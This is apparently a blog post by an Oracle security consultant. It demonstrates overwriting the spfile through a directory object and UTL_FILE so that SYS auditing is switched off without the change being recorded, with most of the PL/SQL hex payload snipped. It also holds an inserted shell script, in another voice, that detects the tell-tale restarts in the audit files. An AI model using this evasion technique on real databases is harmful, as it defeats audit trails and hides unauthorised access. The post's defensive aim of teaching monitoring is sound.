Three Tier Oracle Security in London ~ Paul M. Wright

(nix, oracle, java, www, cloud ) intersect (safety, security, reliability, integrity)


Turning off SYS auditing from the DB without that fact being recorded

Hello World,

Thanks to the many folks that attended the Sentrigo Webinar a few hours ago.
Marketing had a few problems with the GoToWebinar software which were solved by excellent team work, Dunkirk Spirit and a sense of humour ~ but did result in my being unable to show this demo of how the CREATE ANY DIRECTORY privilege can be used to turn off SYS auditing ~ without the act of turning off the audit being recorded in the audit trail itself. This is why shutdowns and startups as part of mandatory audit are important for security folks to monitor, as they may be the only evidence of unauthorised actions having taken place. It is also why using DAMS to enhance Oracle audit is a must for high security organisations (Note: don’t forget to back up your spfile before you do this test).

SQL> sho parameter audit

NAME                                 TYPE        VALUE
------------------------------------ ----------- ------------------------------
audit_file_dest                      string      /u01/app/oracle/admin/orcl/adump
audit_sys_operations                 boolean     TRUE
audit_syslog_level                   string      LOCAL1.INFO
audit_trail                          string      DB

CREATE DIRECTORY DIR2 AS '/u01/app/oracle/product/11.2.0/db_1/dbs';

DECLARE
  fi  UTL_FILE.FILE_TYPE;
  bu  RAW(32767);
  bu2 VARCHAR2(32767);
  bu3 VARCHAR2(32767);
  bu4 VARCHAR2(32767);
  bu5 VARCHAR2(32767);
  bu6 VARCHAR2(32767);
BEGIN
  -- hex image of the replacement spfile, carried in bu2..bu6
  bu2 := hextoraw('4322000001000000000000000000000000000000000000000000000000000000000014300');

  -- 8< --- SNIPPED FOR READABILITY.. SEE SCRIPT LINK AT END OF POSTING --- 8<

  -- reassemble the image and write it over the spfile via the directory object
  bu := hextoraw(bu2||bu3||bu4||bu5||bu6);
  fi := UTL_FILE.fopen('DIR2', 'spfileDB11G.ora', 'w', 32767);
  UTL_FILE.put_raw(fi, bu, TRUE);
  UTL_FILE.fclose(fi);
END;
/

shutdown immediate
startup

SQL> sho parameter audit

NAME                                 TYPE        VALUE
------------------------------------ ----------- ------------------------------
audit_file_dest                      string      /u01/app/oracle/admin/orcl/adump
audit_sys_operations                 boolean     FALSE
audit_syslog_level                   string
audit_trail                          string      DB

The above is a simple demo which arose from a recent conversation with Pete, and is a good reminder of why audit that is external to Oracle’s DB processes is important ~ plus it reinforces the need to prevent DB users from accessing the OS. There are quite a few such methods, as described here: http://www.red-database-security.com/tutorial/tutorials.html
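Since the rewrite above leaves nothing in the DB audit trail, the mandatory SYS audit records for the bounce in audit_file_dest are the evidence to watch. The shell script below is an added example of mine (not the author's demo script): it pulls STARTUP/SHUTDOWN records out of the *.aud files, with the OS user and terminal that issued them. The audit_file_dest path is the one from the output above; the record layout it parses (a timestamp line, then LENGTH/ACTION/CLIENT USER/CLIENT TERMINAL/STATUS lines) is my assumption about the 11g OS audit file format, and the sample records it creates are constructed, not from a real system.

```shell
#!/bin/sh
# Added example, not from the original post: list instance STARTUP/SHUTDOWN
# records found in the SYS OS audit files (audit_file_dest).
# Assumption: record layout is timestamp line, "LENGTH :", "ACTION :",
# "CLIENT USER:", "CLIENT TERMINAL:", "STATUS:" as in 11g *.aud files.

ADUMP="${ADUMP:-/u01/app/oracle/admin/orcl/adump}"   # audit_file_dest from the post

# Print "timestamp | action | os user | terminal" for every lifecycle record.
# Values sit between single quotes, so awk splits fields on the quote character.
sys_audit_lifecycle() {
    dir="$1"
    cat "$dir"/*.aud 2>/dev/null | awk -F "'" '
        /^LENGTH :/         { ts = prev }      # the line before LENGTH is the timestamp
        /^ACTION :/         { act = $2 }
        /^CLIENT USER:/     { usr = $2 }
        /^CLIENT TERMINAL:/ { term = $2 }
        /^STATUS:/          { if (act ~ /STARTUP|SHUTDOWN/) print ts " | " act " | " usr " | " term; act = "" }
                            { prev = $0 }
    '
}

# Number of STARTUP/SHUTDOWN records, handy for an alert threshold
sys_audit_lifecycle_count() {
    sys_audit_lifecycle "$1" | wc -l | tr -d ' '
}

# Constructed sample records (SHUTDOWN, STARTUP, then an unrelated CONNECT)
make_sample_adump() {
    cat > "$1/orcl_ora_1001_1.aud" <<'EOF'
Mon Jun 28 09:15:02 2010 +01:00
LENGTH : '149'
ACTION :[8] 'SHUTDOWN'
DATABASE USER:[1] '/'
PRIVILEGE :[6] 'SYSDBA'
CLIENT USER:[6] 'oracle'
CLIENT TERMINAL:[5] 'pts/1'
STATUS:[1] '0'

Mon Jun 28 09:15:40 2010 +01:00
LENGTH : '148'
ACTION :[7] 'STARTUP'
DATABASE USER:[1] '/'
PRIVILEGE :[6] 'SYSDBA'
CLIENT USER:[6] 'oracle'
CLIENT TERMINAL:[5] 'pts/1'
STATUS:[1] '0'
EOF
    cat > "$1/orcl_ora_1002_1.aud" <<'EOF'
Mon Jun 28 10:01:00 2010 +01:00
LENGTH : '148'
ACTION :[7] 'CONNECT'
DATABASE USER:[1] '/'
PRIVILEGE :[6] 'SYSDBA'
CLIENT USER:[6] 'oracle'
CLIENT TERMINAL:[5] 'pts/2'
STATUS:[1] '0'
EOF
}

# No argument: run against the constructed sample; otherwise scan the given directory
case "${1:-}" in
    "") d=$(mktemp -d); make_sample_adump "$d"; sys_audit_lifecycle "$d"; rm -rf "$d" ;;
    *)  sys_audit_lifecycle "$1" ;;
esac
```

Run it as `sh sys_audit_bounce.sh "$ADUMP"` from cron and compare against the change calendar; a SHUTDOWN/STARTUP pair with no ticket behind it is exactly the signal the post describes. Note that the demo also blanks audit_syslog_level, so these files (or a syslog copy of them) need to be shipped off the DB host where the oracle OS user cannot edit them.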

The above demo is very similar to the CREATE ANY DIRECTORY paper I wrote a couple of years ago. The point is that these critically important configuration files are not checked for changes ~ only the size of the file is verified. It is a good idea to record and verify the sha1sum of these files over time.

The Powerpoint slides from today’s presentation are here.

Thanks again to all those concerned in the presentation today. If your organisation is interested in Oracle Security and/or DAMS you can contact me confidentially to discuss this at paulmwright@oraclesecurity.com. Here is the complete and fully tested script for the above demo (the code works well on 11.2, RHEL5 64-bit).

Cheers,
Paul
